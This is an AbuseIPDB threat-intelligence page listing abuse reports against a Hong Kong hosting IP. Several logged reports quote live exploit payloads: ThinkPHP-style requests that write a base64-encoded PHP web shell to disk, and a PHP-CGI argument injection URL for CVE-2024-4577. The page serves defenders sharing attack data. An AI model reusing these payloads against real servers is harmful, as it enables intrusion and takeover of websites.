JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 66.203.144.113

66.203.144.113 was found in our database!

This IP was reported 49 times. Confidence of Abuse is 0%: ?

ISP	LL
Usage Type	Data Center/Web Hosting/Transit
ASN	AS59371
Domain Name	layerlinks.com
Country	🇭🇰 Hong Kong
City	Tung Chung, Islands

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 66.203.144.113

Whois 66.203.144.113

IP Abuse Reports for 66.203.144.113:

This IP address has been reported a total of 49 times from 32 distinct sources. 66.203.144.113 was first reported on July 1st 2024, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 DNS Admin	2024-07-30 14:22:00 (1 year ago)	request: "POST /index.php/api/Uploadify/preview HTTP/1.1"	Brute-Force Web App Attack
🇫🇷 COMAITE	2024-07-17 07:03:59 (1 year ago)	Multiple web server 400 error codes from same source ip 66.203.144.113.	Web App Attack
🇫🇷 IRISIO	2024-07-17 06:58:12 (1 year ago)	scans/SQL injection/spam posts : 42 queries	SQL Injection Web App Attack
🇮🇩 Incidents Response Neptus Team	2024-07-17 04:34:00 (1 year ago)	Report Abuse IP	Hacking Exploited Host Web App Attack
🇧🇪 cmbplf	2024-07-17 01:59:05 (1 year ago)	170 requests to *.php.bak	Brute-Force Bad Web Bot
Anonymous	2024-07-17 01:18:05 (1 year ago)	Scanning for misc exploits: /php-cgi	Hacking Bad Web Bot Web App Attack
🇨🇦 yukon.ca	2024-07-17 01:16:21 (1 year ago)	Web Server Enforcement Violation: PHP CGI Argument Injection (CVE-2024-4577) Port:80	Hacking Exploited Host
Anonymous	2024-07-17 00:33:12 (1 year ago)	Bot / seems abusive / Apache connections: 26	DDoS Attack Web Spam Bad Web Bot Web App Attack
🇺🇸 MHuiG	2024-07-16 20:07:41 (1 year ago)	The IP has triggered Cloudflare WAF. action: block source: firewallCustom clientAsn: 59371 clientASN ... show more The IP has triggered Cloudflare WAF. action: block source: firewallCustom clientAsn: 59371 clientASNDescription: DNC-AS Dimension Network & Communication Limited clientCountryName: HK clientIP: 66.203.144.113 clientRequestHTTPHost: blog.mhuig.top clientRequestHTTPMethodName: POST clientRequestHTTPProtocol: HTTP/1.1 clientRequestPath: /wp-json/mwai-ui/v1/files/upload clientRequestQuery: datetime: 2024-07-16T19:02:24Z rayName: 8a443f10488a04b9 ruleId: 62370dc6b7504b8c983f836ea0faec20 userAgent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/MHG-LAB/Cloudflare-WAF-to-AbuseIPDB). show less	Open Proxy VPN IP Port Scan Hacking SQL Injection Bad Web Bot Exploited Host Web App Attack
🇺🇸 whitehat AbuseIPDB Official	2024-07-16 13:36:09 (1 year ago)	Suspicious Operation. Request content: _method=__construct&filter[]=assert&server[REQUEST_METHOD]=fi ... show more Suspicious Operation. Request content: _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('onst.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJzIwMjInXSk7Pz4%3D')) show less	Web App Attack
🇺🇸 whitehat AbuseIPDB Official	2024-07-16 13:36:08 (1 year ago)	Suspicious Operation. Request content: s=file_put_contents('ctpv.php',base64_decode('R2lmODlhPD9waHA ... show more Suspicious Operation. Request content: s=file_put_contents('ctpv.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJzIwMjInXSk7Pz4%3D'))&_method=__construct&method=POST&filter[]=assert show less	Web App Attack
🇺🇸 whitehat AbuseIPDB Official	2024-07-16 13:36:07 (1 year ago)	Suspicious Operation. Request content: s=file_put_contents('diih.php',base64_decode('R2lmODlhPD9waHA ... show more Suspicious Operation. Request content: s=file_put_contents('diih.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJzIwMjInXSk7Pz4%3D'))&_method=__construct&method=POST&filter[]=assert show less	Web App Attack
🇫🇷 oh.mg	2024-07-14 16:47:52 (1 year ago)	(mod_security) mod_security (id:949110) triggered by 66.203.144.113 (HK/Hong Kong/-): 1 in the last ... show more (mod_security) mod_security (id:949110) triggered by 66.203.144.113 (HK/Hong Kong/-): 1 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_TRIGGER; Logs: [Sun Jul 14 16:47:47.237698 2024] [:error] [pid 1744210:tid 139739336554240] [client 66.203.144.113:54533] [client 66.203.144.113] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:blocking_inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "184"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [ver "OWASP_CRS/4.0.0-rc1"] [tag "anomaly-evaluation"] [hostname "oh.mg"] [uri "/php-cgi/php-cgi.exe"] [unique_id "ZpQBM3MqybG1mIHbHMsTTAAAAIA"], referer: https://oh.mg/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input show less	Port Scan
🇺🇸 whitehat AbuseIPDB Official	2024-07-14 12:55:57 (1 year ago)	Suspicious Operation. Request content: _method=__construct&filter[]=assert&server[REQUEST_METHOD]=fi ... show more Suspicious Operation. Request content: _method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('hwvq.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJzIwMjInXSk7Pz4%3D')) show less	Web App Attack
🇺🇸 whitehat AbuseIPDB Official	2024-07-14 12:55:56 (1 year ago)	Suspicious Operation. Request content: s=file_put_contents('etyj.php',base64_decode('R2lmODlhPD9waHA ... show more Suspicious Operation. Request content: s=file_put_contents('etyj.php',base64_decode('R2lmODlhPD9waHAgY2xhc3MgR2FNMTBmQTUgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg3bXU2KXsgQGV2YWwoIi8qWkc1emtuUmZTayovIi4kSDdtdTYuIiIpOyB9fW5ldyBHYU0xMGZBNSgkX1JFUVVFU1RbJzIwMjInXSk7Pz4%3D'))&_method=__construct&method=POST&filter[]=assert show less	Web App Attack

Showing 1 to 15 of 49 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇳🇱 217.60.195.229

🇰🇷 211.178.247.182

🇵🇦 200.115.141.58

🇨🇳 121.40.45.152

🇺🇸 104.155.150.43

🇮🇹 93.38.26.45

🇨🇳 36.110.172.218

🇺🇸 34.73.186.47

🇺🇸 172.253.91.153

🇯🇵 172.71.100.193

🇺🇸 162.216.150.82

🇮🇳 154.84.217.86

🇺🇸 143.14.6.3

🇨🇳 111.61.175.117

🇸🇬 107.155.56.47

🇬🇧 35.203.211.87

🇸🇬 34.143.234.128

🇳🇱 206.123.156.179

🇫🇷 172.71.134.69

🇧🇼 168.167.81.187